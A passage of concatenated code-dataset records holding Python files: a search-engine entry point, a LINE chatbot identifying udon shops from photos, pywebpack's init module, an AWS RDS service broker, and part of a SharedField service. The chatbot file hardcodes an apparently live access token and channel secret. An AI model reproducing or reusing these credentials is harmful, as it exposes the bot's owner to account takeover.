all_page_ids_file_name = '../all_page_ids.bin'\n coordinate_index_file_name = '../coordinate_index.bin'\n jump_table_file_name = '../jump_table.bin'\n inverse_index_title_file_name = '../inverse_title_index.bin'\n coordinate_index_title_file_name = '../coordinate_title_index.bin'\n\n #parse_wiki_xml(xml_file_name, data_file_name)\n #tokenization(data_file_name, token_file_name)\n #print_token_statistic(token_file_name)\n #test_tokenization()\n # estimate(assessment_file_name, estimate_result_file_name)\n #indexation(token_file_name, dictionary_file_name, inverse_index_file_name, straight_index_file_name, coordinate_index_file_name, jump_table_file_name)\n #create_all_page_ids(token_file_name, all_page_ids_file_name)\n #stats_term(token_file_name, index_file_name)\n #test_indexation()\n #stats_frequency_term_and_zipf(token_file_name, graph_output_file_name)\n #unittest.main()\n #stats_coordinates(dictionary_file_name, inverse_index_file_name, coordinate_index_file_name)\n #stat_before_compress_feat(token_file_name, dictionary_file_name, inverse_index_file_name, straight_index_file_name, coordinate_index_file_name)\n collocation_search(token_file_name)\n\n # com_args_parser = argparse.ArgumentParser()\n # com_args_parser.add_argument('--interactive-search', '-i', action=\"store_true\", help='search by input requests')\n # com_args_parser.add_argument('--search-request-file', '-s', type=str, help='search by requests in file')\n # com_args_parser.add_argument('--output-file', '-o', type=str, help='output file')\n # my_namespace = com_args_parser.parse_args()\n #\n # dictionary = read_dictionary(dictionary_file_name)\n # straight_index = read_straight_index(straight_index_file_name)\n # all_page_ids = read_all_page_ids(all_page_ids_file_name)\n # all_page_ids_with_stat = read_all_page_ids_with_stat(all_page_ids_file_name)\n #\n # if my_namespace.interactive_search:\n # print('Request: ', end='', flush=True)\n # for request in sys.stdin:\n # start_time = time.time()\n # serp = get_SERP_by_request(request, dictionary, inverse_index_file_name, all_page_ids, straight_index,\n # coordinate_index_file_name, jump_table_file_name, all_page_ids_with_stat,\n # token_file_name, inverse_index_title_file_name, coordinate_index_title_file_name)\n # request_time = time.time() - start_time\n #\n # print('\\n============= SERP time is ' + to_format(request_time, 4) + 's =============\\n', flush=True)\n #\n # if serp is not None:\n # print(serp, flush=True)\n # else:\n # print('Pages is not found.', flush=True)\n # print('Request: ', end='', flush=True)\n # elif my_namespace.search_request_file is not None:\n # if my_namespace.output_file is None:\n # print('Error: no output-file option!')\n # exit(0)\n # try:\n # request_file = open(my_namespace.search_request_file, 'r', encoding='utf-8')\n # output_file = open(my_namespace.output_file, 'w', encoding='utf-8')\n # for request in request_file:\n # #print(request)\n # start_time = time.time()\n # serp = get_SERP_by_request(request, dictionary, inverse_index_file_name, all_page_ids, straight_index,\n # coordinate_index_file_name, jump_table_file_name, all_page_ids_with_stat,\n # token_file_name, inverse_index_title_file_name, coordinate_index_title_file_name)\n # request_time = time.time() - start_time\n # output_file.write('Request: [' + request + ']\\n')\n # output_file.write('============= SERP time is ' + to_format(request_time, 4) + 's =============\\n')\n # if serp is not None:\n # output_file.write(serp)\n # else:\n # output_file.write('Pages is not found.\\n')\n # except IOError:\n # print('Error: Could not open file(s)!')\n # exit(0)\n\n\nif __name__ == \"__main__\":\n run()\n\n\n","sub_path":"python/search_engine.py","file_name":"search_engine.py","file_ext":"py","file_size_in_byte":85418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"504004620","text":"import numpy as np\n\nfrom flask import Flask, request, abort\n\nfrom linebot import (LineBotApi, WebhookHandler)\nfrom linebot.exceptions import (InvalidSignatureError)\nfrom linebot.models import (MessageEvent, TextMessage, TextSendMessage, ImageMessage, ImageSendMessage)\n\n#from keras.models import load_model\n#from keras.preprocessing import image\n\n# TensorFlow cpu == 2.3.1\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import image\n\n#model = load_model(\"efficientnet_No20\")\nmodel = load_model('ResNet_32.h5')\n\nimport pandas as pd\nimport os\n\napp = Flask(__name__)\n\nACCESS_TOKEN = \"6SWeij+DVrTEQSBNyP2MxqdYHRuGYNSGtXHB3qwddm6+4JAY4E+qFuquzr29jYObYIWBplN8fQbj7uK7OBVymp/O7gMGjhvEmNyR0q2ii0XhvUYOGxUPZZfE0pWjGxZYw77KF7A9aQSnb50ZHkhajAdB04t89/1O/w1cDnyilFU=\"\nSECRET = \"2af7991203a82a3410e80e864412834a\"\n\n#FQDN = \"https://cats-vs-dogs-line-bot-naoya.herokuapp.com/callback\"\nFQDN = \"https://udon-ai-bot.herokuapp.com/callback\"\n\nline_bot_api = LineBotApi(ACCESS_TOKEN)\nhandler = WebhookHandler(SECRET)\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n signature = request.headers['X-Line-Signature']\n\n body = request.get_data(as_text=True)\n app.logger.info(\"Requestbody: \" + body)\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return'OK'\n\n@handler.add(MessageEvent, message=ImageMessage)\ndef handle_image_message(event):\n message_content = line_bot_api.get_message_content(event.message.id)\n \n # 取得した画像ファイル\n with open(\"data/\"+event.message.id+\".jpg\", \"wb\") as f:\n \n #get_img_text = \"AI判別中です。 \\n少しお待ちください。\"\n #line_bot_api.reply_message(event.reply_token, TextSendMessage(text=get_img_text))\n \n f.write(message_content.content)\n \n\n test_url = \"./data/\"+event.message.id+\".jpg\"\n\n #img = image.load_img(test_url, target_size=(224, 224)) # read image as PIL data\n img = image.load_img(test_url, target_size=(160, 160)) # read image as PIL data\n x = image.img_to_array(img) # convert PIL data to Numpy Array\n x = np.expand_dims(x, axis=0)\n x = x / 255.0\n\n # モデルのロード\n try:\n\n predict = model.predict(x).flatten()\n \"\"\"\n suzaki_score = predict[0]*100\n gamou_score = predict[1]*100\n nagata_score = predict[2]*100\n hinode_score = predict[3]*100\n tamura_score = predict[4]*100\n setobare_score = predict[5]*100\n hayuka_score = predict[6]*100\n ippuku_score = predict[7]*100\n tanigawa_score = predict[8]*100\n mugizou_score = predict[9]*100\n miyoshi_score = predict[10]*100\n ookura_score = predict[11]*100\n yamagoe_score = predict[12]*100\n okasen_score = predict[13]*100\n nakamura_score = predict[14]*100\n yoshiya_score = predict[15]*100\n kamakiri_score = predict[16]*100\n joto_score = predict[17]*100\n nekko_score = predict[18]*100\n yamadaya_score = predict[19]*100\n \"\"\"\n \"\"\"\n classnames = [\"000_suzaki-shokuryohinten_mitoyo\", \"001_gamou_sakaide\",\n \"002_nagata-in-kanoka_zentsuji\",\"003_hinode-seimenjo_sakaide\",\n \"004_tamura_ayagawa\",\"005_setobare_takamatsu\",\n \"006_hayuka_ayagawa\",\"007_ippuku_takamatsu\",\"008_tanigawa-beikokuten_mannou\",\n \"009_mugizou_takamatsu\",\"010_miyoshi-udon_mitoyo\",\"011_ookura_takamatsu\",\n \"012_yamagoe_ayagawa\",\"013_okasen_utazu\",\n \"014_nakamura-udon_marugame\",\"015_yoshiya_marugame\",\n \"016_kamakiri_kanonji\",\"017_joto_kanonji\",\n \"018_nekko_tadotsu\",\"019_yamadaya_takamatsu\"]\n \"\"\"\n\n classnames = [\"須崎食料品店\", \"讃岐うどん がもう\",\n \"釜あげうどん 長田 in 香の香\",\"日の出製麺所\",\n \"手打うどん たむら\",\"おうどん 瀬戸晴れ\",\n \"本格手打うどん はゆか\",\"うどん 一福\",\"谷川米穀店\",\n \"手打うどん 麦蔵\",\"三好うどん\",\"手打ちうどん 大蔵\",\n \"山越うどん\",\"本格手打うどん おか泉\",\n \"中村うどん\",\"純手打うどん よしや\",\n \"カマ喜ri \",\"西端手打 上戸\",\n \"根ッ子うどん\",\"うどん本陣 山田家\"]\n\n index = np.argmax(predict)\n \n udonya_score = predict[index]*100\n \n label = classnames[index]\n\n text = f\"これは「{label}」のうどんです。\\n自信は{udonya_score:.1f}%です。\"\n\n line_bot_api.reply_message(event.reply_token, TextSendMessage(text=text))\n\n except:\n line_bot_api.reply_message(event.reply_token, TextSendMessage(text=\"failed\"))\n\n\n #line_bot_api.reply_message(event.reply_token,ImageSendMessage(original_content_url=FQDN+\"/static/\"+event.message.id+\".jpg\",preview_image_url=FQDN+\"/static/\"+event.message.id+\".jpg\"))\n \n\nif __name__ == \"__main__\":\n app.run() \n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"392968502","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of PyWebpack\n# Copyright (C) 2017 CERN.\n#\n# PyWebpack is free software; you can redistribute it and/or modify\n# it under the terms of the Revised BSD License; see LICENSE file for\n# more details.\n\n\"\"\"Webpack integration layer for Python.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nfrom .bundle import WebpackBundle\nfrom .helpers import bundles_from_entry_point\nfrom .manifests import Manifest, ManifestEntry, ManifestLoader, \\\n WebpackManifestFactory, WebpackYamFactory, WebpackBundleTrackerFactory, \\\n ManifestError, InvalidManifestError, UnfinishedManifestError, \\\n UnsupportedExtensionError, UnsupportedManifestError\nfrom .project import WebpackProject, WebpackTemplateProject, \\\n WebpackBundleProject\nfrom .storage import FileStorage, LinkStorage\nfrom .version import __version__\n\n__all__ = (\n '__version__',\n 'bundles_from_entry_point',\n 'FileStorage',\n 'InvalidManifestError',\n 'LinkStorage',\n 'Manifest',\n 'ManifestEntry',\n 'ManifestError',\n 'ManifestLoader',\n 'UnfinishedManifestError',\n 'UnsupportedExtensionError',\n 'UnsupportedManifestError',\n 'WebpackBundle',\n 'WebpackBundleProject',\n 'WebpackBundleTrackerFactory',\n 'WebpackManifestFactory',\n 'WebpackProject',\n 'WebpackTemplateProject',\n 'WebpackYamFactory',\n)\n","sub_path":"pywebpack/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"344861770","text":"# TODO: Resovle org/space guids to common names and tag instance\nimport os\nimport json\nimport yaml\nimport bottle\nimport random\nimport string\nimport utils\nfrom rds import RDS\nfrom time import sleep\nimport botocore.exceptions\n\n\nX_BROKER_API_VERSION = 2.6\nX_BROKER_API_VERSION_NAME = 'X-Broker-Api-Version'\nCONFIG = None\n\n\ndef init():\n global CONFIG\n with open('config.yml', 'r') as f:\n CONFIG = yaml.load(f.read())\n # This will check to ensure the dynamodb table exists. If it does\n # not it will create the table and block until it is usable.\n utils.check_dynamodb(\n table_name=CONFIG['dynamodb_table'], **CONFIG['aws']\n )\n\n\ndef authenticate(username, password):\n if username == CONFIG['basic_auth_user']:\n if password == CONFIG['basic_auth_pass']:\n return True\n else:\n bottle.abort(401, \"Unauthorized\")\n else:\n bottle.abort(401, \"Unauthorized\")\n\n\ndef _redirect_http_to_https(callback):\n \"\"\"Bottle plugin that redirects all http requests to https\"\"\"\n def wrapper(*args, **kwargs):\n scheme = bottle.request.urlparts[0]\n if scheme == 'http':\n # request is http; redirect to https\n bottle.redirect(bottle.request.url.replace('http', 'https', 1))\n else:\n return callback(*args, **kwargs)\n return wrapper\n\n\ndef _abort_async_required():\n # Return 422 and an error if the client does not support async\n # service broker requests.\n bottle.response.content_type = 'application/json'\n bottle.response.status = 422\n msg = json.dumps({\n \"error\": \"AsyncRequired\",\n \"description\": \"This service plan requires client support for \"\n \"asynchronous service operations. Please use \"\n \"the CLI tools to provision this service.\"\n })\n return msg\n\n\n@bottle.error(401)\n@bottle.error(409)\ndef error(error):\n bottle.response.content_type = 'application/json'\n resp = {'error': \"{0}\".format(error.body)}\n return json.dumps(resp)\n\n\n@bottle.route('/v2/catalog', method='GET')\n@bottle.auth_basic(authenticate)\ndef catalog():\n \"\"\"Returns the service catalog to the cloud controller.\n \"\"\"\n # The gorouter seems to strip this (and other) headers out if the\n # service broker is hosted as a Cloud Foundry app. You can enable\n # this header check (as per the API spec) if the app is not hosted\n # in Cloud Foundry by setting the `hosted_in_cloud_foundry` option\n # in the config file to false. The default value is true.\n cf_app = CONFIG.get('hosted_in_cloud_foundry', True)\n if cf_app is not True:\n api_version = bottle.request.headers.get('X-Broker-Api-Version', 2.6)\n if not api_version or float(api_version) < X_BROKER_API_VERSION:\n msg = (\"Missing or incompatible {0}. Expecting version {1} or \"\n \"later\".format(X_BROKER_API_VERSION_NAME,\n X_BROKER_API_VERSION))\n bottle.abort(409, msg)\n bottle.response.content_type = 'application/json'\n return json.dumps({'services': CONFIG['services']})\n\n\n@bottle.route('/v2/service_instances/', method='PUT')\n@bottle.auth_basic(authenticate)\ndef provision(instance_id):\n \"\"\"Provisions an RDS instance.\n \"\"\"\n # TODO: Break this up into more maintainable chunks.\n if bottle.request.content_type != 'application/json':\n bottle.abort(\n 415,\n 'Unsupported Content-Type: expecting application/json'\n )\n incompletes = bottle.request.query.getone('accepts_incomplete')\n bottle.response.content_type = 'application/json'\n if incompletes is None:\n return _abort_async_required()\n if incompletes.lower() == 'true':\n data = json.loads(bottle.request.body.read())\n for plan in CONFIG['plan_settings']:\n if plan['id'] == data['plan_id']:\n plan_params = dict(plan)\n # Remove the id value from the params so we can just\n # pass the whole dict along to the RDS class.\n del plan_params['id']\n break\n else:\n bottle.response.status = 400\n return json.dumps({'description': 'Plan ID does not exist'})\n rds = RDS(**CONFIG['aws'])\n # Update the rds class instance with the parameters for the\n # plan as defined in the configuration.\n rds.__dict__.update(plan_params)\n # Parse and use extra parameters that have been passed in by\n # the user.\n #\n # TODO: Move allowed_params to config so operator can determine\n # what they want to allow.\n allowed_params = ['DBName', 'AllocatedStorage']\n if CONFIG['deploy_from_snapshots'] is True:\n allowed_params.append('DBSnapshotIdentifier')\n if 'parameters' in data.keys():\n user_params = dict([\n (k, v) for (k, v) in data['parameters'].items()\n if k in allowed_params\n ])\n rds.__dict__.update(user_params)\n else:\n user_params = {}\n params_to_update = {}\n rds.DBInstanceIdentifier = '-'.join([rds.Engine.lower(), instance_id])\n rds.MasterUserPassword = utils.random_string()\n if rds.DBSnapshotIdentifier is None:\n last_operation = 'create'\n source_snapshot = 'NONE'\n step = 'NONE'\n first_char = random.choice(string.letters)\n rds.MasterUsername = ''.join([\n first_char,\n utils.random_string(15)\n ])\n rds.create_instance()\n else:\n last_operation = 'create_from_snapshot'\n source_snapshot = rds.DBSnapshotIdentifier\n step = 'deploy'\n try:\n snapshot_metadata = rds.snapshot_metadata()\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DBSnapshotNotFound':\n bottle.response.status = 400\n return json.dumps(\n {'description': 'Invalid snapshot identifier'}\n )\n else:\n raise\n if snapshot_metadata['Engine'] != rds.Engine.lower():\n bottle.response.status = 400\n return json.dumps(\n {'description': 'Database engine in snapshot differs from '\n 'database engine in plan settings.'}\n )\n rds.MasterUsername = snapshot_metadata['MasterUsername']\n rds.Port = snapshot_metadata['Port']\n # If the user is requesting a bigger disk than the snapshot\n # was generated from store this parameter so we can change\n # it during the modify operation after initial provisioning.\n if rds.AllocatedStorage > snapshot_metadata['AllocatedStorage']:\n params_to_update['AllocatedStorage'] = rds.AllocatedStorage\n if rds.StorageType != snapshot_metadata['StorageType']:\n params_to_update['StorageType']\n # When deploying from snapshot the security groups is always\n # set to the default security group. The only way to change\n # it is to modify the instance after provisioning is done.\n # If the security group IDs are provided then they take\n # precedence over the named security groups. If named\n # groups are provided they will be validated now before the\n # instance is created and stored to be applied after the\n # instance is done with initial bootstrapping.\n if rds.VpcSecurityGroupIds:\n params_to_update['VpcSecurityGroupIds'] = rds.VpcSecurityGroupIds\n else:\n group_ids = rds.validate_security_groups()\n if group_ids[0]:\n params_to_update['VpcSecurityGroupIds'] = group_ids[1]\n else:\n bottle.response.status = 400\n return json.dumps(\n {'description': 'Invalid AWS security group id'}\n )\n rds.create_from_snapshot()\n iv = utils.Crypt.generate_iv()\n credentials = {\n 'username': rds.MasterUsername,\n 'password': rds.MasterUserPassword,\n 'hostname': '',\n 'port': rds.Port,\n 'db_name': rds.DBName,\n 'uri': '',\n }\n with utils.Crypt(iv=iv, key=CONFIG['encryption_key']) as c:\n creds = c.encrypt(json.dumps(credentials))\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = {\n 'instance_id': instance_id,\n 'iv': iv,\n 'hostname': rds.DBInstanceIdentifier,\n 'credentials': creds,\n 'engine': rds.Engine,\n 'binding_ids': [],\n 'parameters': user_params,\n 'last_operation': last_operation,\n 'source_snapshot': source_snapshot,\n 'step': step,\n 'params_to_update': params_to_update\n }\n record.update(data)\n table.put_item(Item=record)\n else:\n return _abort_async_required()\n bottle.response.status = 202\n return json.dumps({\"dashboard_url\": \"\"})\n\n\n@bottle.route('/v2/service_instances/', method='PATCH')\n@bottle.auth_basic(authenticate)\ndef update(instance_id):\n updateable_params = ('AllocatedStorage',)\n incompletes = bottle.request.query.getone('accepts_incomplete')\n bottle.response.content_type = 'application/json'\n if incompletes is None:\n return _abort_async_required()\n data = json.loads(bottle.request.body.read())\n for param in data['parameters'].keys():\n if param not in updateable_params:\n bottle.response.status = 400\n msg = 'Updating of {0} is not supported'.format(param)\n return json.dumps({'description': msg})\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = table.get_item(Key={'instance_id': instance_id})\n if 'Item' not in record.keys():\n bottle.response.status = 410\n return json.dumps({})\n else:\n record = record.pop('Item')\n rds = RDS(DBInstanceIdentifier=record['hostname'], **CONFIG['aws'])\n details = rds.db_instance_details()\n if data['parameters']['AllocatedStorage'] <= details['AllocatedStorage']:\n bottle.response.status = 400\n return json.dumps({\n 'description': 'Decreasing AllocatedStorage is not supported.'\n })\n rds.update_instance(\n DBInstanceIdentifier=record['hostname'],\n **data['parameters']\n )\n for i in xrange(0,10):\n details = rds.db_instance_details()\n if details['DBInstanceStatus'] != 'available':\n break\n sleep(5)\n else:\n bottle.response.status = 408\n return json.dumps({})\n record['last_operation'] = 'update'\n record['parameters'] = data['parameters']\n table.put_item(Item=record)\n bottle.response.status = 202\n return json.dumps({})\n\n\n@bottle.route('/v2/service_instances/', method='DELETE')\n@bottle.auth_basic(authenticate)\ndef deprovision(instance_id):\n \"\"\"Destroys an RDS instance.\n \"\"\"\n # The deprovision endpoint supports both sync and async requests.\n # Ideally this would be async only since the operation is actually\n # async, but in at least v208 (probably some later versions as\n # well) it seems that the cloud controller does not include the\n # accepts_incomplete param in the request. The last_operation\n # endpoint supports async deprovisions so this should \"just work\"\n # with either sync or async operations. The main difference is\n # that the dynamodb reference will be removed here instead of\n # opportunistically by the last_operation endpoint.\n incompletes = bottle.request.query.getone('accepts_incomplete')\n bottle.response.content_type = 'application/json'\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = table.get_item(Key={'instance_id': instance_id})\n if 'Item' not in record.keys():\n bottle.response.status = 410\n return json.dumps({})\n record = record.pop('Item')\n record['last_operation'] = 'destroy'\n rds = RDS(DBInstanceIdentifier=record['hostname'], **CONFIG['aws'])\n rds.destroy_instance()\n if incompletes.lower() == 'true':\n bottle.response.status = 202\n table.put_item(Item=record)\n else:\n bottle.response.status = 200\n table.delete_item(Key={'instance_id': instance_id})\n return json.dumps({})\n\n\n@bottle.route('/v2/service_instances/'\n '/service_bindings/', method='PUT')\n@bottle.auth_basic(authenticate)\ndef bind(instance_id, binding_id):\n \"\"\"Return credentials for the service to the cloud controller for app\n binding to the service.\n \"\"\"\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = table.get_item(Key={'instance_id': instance_id})\n if 'Item' not in record.keys():\n bottle.response.status = 410\n return json.dumps({})\n record = record.pop('Item')\n if binding_id not in record['binding_ids']:\n record['binding_ids'].append(binding_id)\n table.put_item(Item=record)\n with utils.Crypt(iv=record['iv'], key=CONFIG['encryption_key']) as c:\n creds = json.loads(c.decrypt(record['credentials']))\n bottle.response.status = 201\n bottle.response.content_type = 'application/json'\n return json.dumps({'credentials': creds})\n\n\n@bottle.route('/v2/service_instances/'\n '/service_bindings/', method='DELETE')\n@bottle.auth_basic(authenticate)\ndef unbind(instance_id, binding_id):\n \"\"\"Unbind the service credentials from the application\n \"\"\"\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = table.get_item(Key={'instance_id': instance_id})\n if 'Item' in record.keys():\n record = record.pop('Item')\n for index, value in enumerate(record['binding_ids']):\n if value == binding_id:\n del record['binding_ids'][index]\n table.put_item(Item=record)\n bottle.response.status = 200\n response = {}\n bottle.response.content_type = 'application/json'\n return json.dumps(response)\n\n\n@bottle.route('/v2/service_instances/'\n '/last_operation', METHOD='GET')\n@bottle.auth_basic(authenticate)\ndef last_operation(instance_id):\n \"\"\"Check on the state of the async provisioning operation\n \"\"\"\n bottle.response.content_type = 'application/json'\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n record = table.get_item(Key={'instance_id': instance_id})\n if 'Item' not in record.keys():\n bottle.response.status = 410\n return json.dumps({})\n record = record.pop('Item')\n rds = RDS(name=record['hostname'], **CONFIG['aws'])\n if record['last_operation'] == 'create':\n return create_polling(record)\n elif record['last_operation'] == 'create_from_snapshot':\n return create_from_snapshot_polling(record)\n elif record['last_operation'] == 'destroy':\n return destroy_polling(record)\n elif record['last_operation'] == 'update':\n return update_polling(record)\n else:\n # If last operation is in an unknown state return 410.\n bottle.response.status = 410\n return json.dumps({})\n\n\ndef create_polling(record):\n \"\"\"Last operation polling logic for create action.\n \"\"\"\n bottle.response.content_type = 'application/json'\n try:\n rds = RDS(name=record['hostname'], **CONFIG['aws'])\n filters = {'DBInstanceIdentifier': record['hostname']}\n details = rds.rds_conn.describe_db_instances(**filters)\n details = details['DBInstances'][0]\n except botocore.exceptions.ClientError as e:\n # This exception will be raised if nothing matches the filter.\n if e.response['Error']['Code'] == 'DBInstanceNotFound':\n bottle.response.status = 410\n return json.dumps({})\n else:\n raise\n if details['DBInstanceStatus'] == 'available':\n # If the instance is available, pull the credentials\n # blob out of the record, decrypt it, update it with\n # the new information, encrypt it, and update dynamodb,\n # and return success for instance provision.\n with utils.Crypt(iv=record['iv'],\n key=CONFIG['encryption_key']) as c:\n creds = c.decrypt(record['credentials'])\n creds = json.loads(creds)\n creds['hostname'] = details['Endpoint']['Address']\n uri = '{0}://{1}:{2}@{3}:{4}/{5}'.format(\n details['Engine'].lower(),\n creds['username'],\n creds['password'],\n creds['hostname'],\n creds['port'],\n creds['db_name']\n )\n creds['uri'] = uri\n with utils.Crypt(iv=record['iv'],\n key=CONFIG['encryption_key']) as c:\n creds = c.encrypt(json.dumps(creds))\n record['credentials'] = creds\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n table.put_item(Item=record)\n response = {'state': 'succeeded',\n 'description': 'Service Created.'}\n bottle.response.status = 200\n return json.dumps(response)\n else:\n # If the RDS instance is in a state other than available\n # then return the state as 'in progress' and the actual\n # status for the instance in the message. This will\n # cause the cloud controller to continue polling until\n # the RDS instance is available for use.\n msg = ('RDS Instance is currently in the {0} '\n 'state.'.format(details['DBInstanceStatus']))\n response = {'state': 'in progress', 'description': msg}\n bottle.response.status = 200\n return json.dumps(response)\n\n\ndef create_from_snapshot_polling(record):\n \"\"\"Last operation polling logic for create_from_snaphost action.\n \"\"\"\n bottle.response.content_type = 'application/json'\n try:\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n rds = RDS(name=record['hostname'], **CONFIG['aws'])\n filters = {'DBInstanceIdentifier': record['hostname']}\n details = rds.rds_conn.describe_db_instances(**filters)\n details = details['DBInstances'][0]\n except botocore.exceptions.ClientError as e:\n # This exception will be raised if nothing matches the filter.\n if e.response['Error']['Code'] == 'DBInstanceNotFound':\n bottle.response.status = 410\n return json.dumps({})\n else:\n raise\n if record['step'] == 'deploy':\n if details['DBInstanceStatus'] == 'available':\n params = {'DBInstanceIdentifier': record['hostname']}\n params.update(record['params_to_update'])\n # Get the new password to pass along for modify.\n with utils.Crypt(iv=record['iv'],\n key=CONFIG['encryption_key']) as c:\n creds = json.loads(c.decrypt(record['credentials']))\n params['MasterUserPassword'] = creds['password']\n rds.update_instance(**params)\n record['step'] = 'modify'\n table.put_item(Item=record)\n msg = ('RDS Instance is currently in the {0} '\n 'state.'.format(details['DBInstanceStatus']))\n response = {'state': 'in progress', 'description': msg}\n bottle.response.status = 200\n return json.dumps(response)\n elif record['step'] == 'modify':\n if details['DBInstanceStatus'] == 'available':\n with utils.Crypt(iv=record['iv'],\n key=CONFIG['encryption_key']) as c:\n creds = json.loads(c.decrypt(record['credentials']))\n creds['hostname'] = details['Endpoint']['Address']\n uri = '{0}://{1}:{2}@{3}:{4}/{5}'.format(\n details['Engine'].lower(),\n creds['username'],\n creds['password'],\n creds['hostname'],\n creds['port'],\n creds['db_name']\n )\n creds['uri'] = uri\n with utils.Crypt(iv=record['iv'],\n key=CONFIG['encryption_key']) as c:\n creds = c.encrypt(json.dumps(creds))\n record['credentials'] = creds\n record['step'] = 'complete'\n table.put_item(Item=record)\n msg = ('RDS Instance is currently in the {0} '\n 'state.'.format(details['DBInstanceStatus']))\n response = {'state': 'in progress', 'description': msg}\n bottle.response.status = 200\n return json.dumps(response)\n elif record['step'] == 'complete':\n response = {'state': 'succeeded', 'description': 'Service Created.'}\n bottle.response.status = 200\n return json.dumps(response)\n else:\n msg = 'The instance failed to provision'\n response = {'state': 'failed', 'description': msg}\n bottle.response.status = 200\n return json.dumps(response)\n\n\ndef destroy_polling(record):\n \"\"\"Last operation polling logic for destroy action.\n \"\"\"\n rds = RDS(DBInstanceIdentifier=record['hostname'], **CONFIG['aws'])\n if record['hostname'] in rds.get_all_identifiers():\n response = {\n 'state': 'in progress',\n 'description': 'Destroying service.'\n }\n bottle.response.status = 200\n return json.dumps(response)\n else:\n dynamodb = utils.boto3_session(**CONFIG['aws']).resource('dynamodb')\n table = dynamodb.Table(name=CONFIG['dynamodb_table'])\n table.delete_item(Key={'instance_id': record['instance_id']})\n bottle.response.status = 410\n return json.dumps({})\n\ndef update_polling(record):\n \"\"\"Last operation polling logic for update action.\n \"\"\"\n rds = RDS(DBInstanceIdentifier=record['hostname'], **CONFIG['aws'])\n details = rds.db_instance_details()\n if details['DBInstanceStatus'] != 'available':\n response = {'state': 'in progress', 'description': 'Updating service.'}\n bottle.response.status = 200\n return json.dumps(response)\n else:\n response = {'state': 'succeeded', 'description': 'Service updated.'}\n bottle.response.status = 200\n return json.dumps(response)\n\nif __name__ == '__main__':\n init()\n port = int(os.getenv('PORT', '8080'))\n bottle.run(host='0.0.0.0', port=port, reloader=True)\nelse:\n init()\n bottle.install(_redirect_http_to_https)\n app = application = bottle.default_app()\n\n\n","sub_path":"rds_sb_app.py","file_name":"rds_sb_app.py","file_ext":"py","file_size_in_byte":23344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"20899977","text":"\"\"\"\nSharedField service\n\"\"\"\n\nfrom app import DB\nfrom app.models import SharedField\nfrom app.helper.decorators import transaction_decorator\nfrom app.helper.errors import SharedFieldNotExist\nfrom app.schemas import SharedFieldPostSchema, SharedFieldResponseSchema\n\n\nclass SharedFieldService:\n \"\"\"\n SharedField Service class\n \"\"\"\n\n @staticmethod\n @transaction_decorator\n def create(user_id, field_id, owner_id):\n \"\"\"\n SharedField model create method\n\n :param user_id: id of user object\n :param field_id: id of field object\n :param owner_id: owner of the field that's being shared\n :return: created SharedField instance\n \"\"\"\n\n shared_field = SharedField(user_id=user_id, field_id=field_id, owner_id=owner_id)\n DB.session.add(shared_field)\n return shared_field\n\n @staticmethod\n def get_by_id(shared_field_id):\n \"\"\"\n SharedField model get by id method\n\n :param shared_field_id: id of the SharedField instance\n :return: SharedField instance with a specific id or None\n \"\"\"\n\n shared_field = SharedField.query.get(shared_field_id)\n return shared_field\n\n @staticmethod\n def filter(shared_field_id=None, user_id=None, field_id=None, owner_id=None):\n \"\"\"\n SharedField model filter method\n\n :param shared_field_id: is of the SharedField instance\n :param user_id: id of the user object\n :param field_id: id of the field object\n :param owner_id: owner of the field that's being shared\n :return: list of SharedField instances\n \"\"\"\n filter_data = {}\n if shared_field_id is not None:\n filter_data['shared_field_id'] = shared_field_id\n if user_id is not None:\n filter_data['user_id'] = user_id\n if field_id is not None:\n filter_data['field_id'] = field_id\n if owner_id is not None:\n filter_data['owner_id'] = owner_id\n result = SharedField.query.filter_by(**filter_data).all()\n return result\n\n @staticmethod\n @transaction_decorator\n def delete(shared_field_id):\n \"\"\"\n SharedField delete method\n\n :param shared_field_id: id of the SharedField instance\n :return: True if shared_field was deleted\n \"\"\"\n\n shared_field = SharedFieldService.get_by_id(shared_field_id)\n if shared_field is None:\n raise SharedFieldNotExist()\n DB.session.delete(shared_field)\n return True\n\n @staticmethod\n def to_json(data, many=False):\n \"\"\"\n Get data in json format\n \"\"\"\n schema = SharedFieldPostSchema(many=many)\n return schema.dump(data)\n\n @staticmethod\n def response_to_json(data, many=False):\n \"\"\"\n Get response data in json format\n \"\"\"\n schema = SharedFieldResponseSchema(many=many)\n return schema.dump(data)\n\n @staticmethod\n def get_by_user_and_field(user_id, field_id):\n \"\"\"\n Get SharedField instance by user_id and field_id\n\n :param user_id: id of the user to whom the field was shared to\n :param field_id: id of the field that was shared\n :return: SharedField instance or None\n \"\"\"\n shared_field_instance = SharedField.query.filter_by(\n 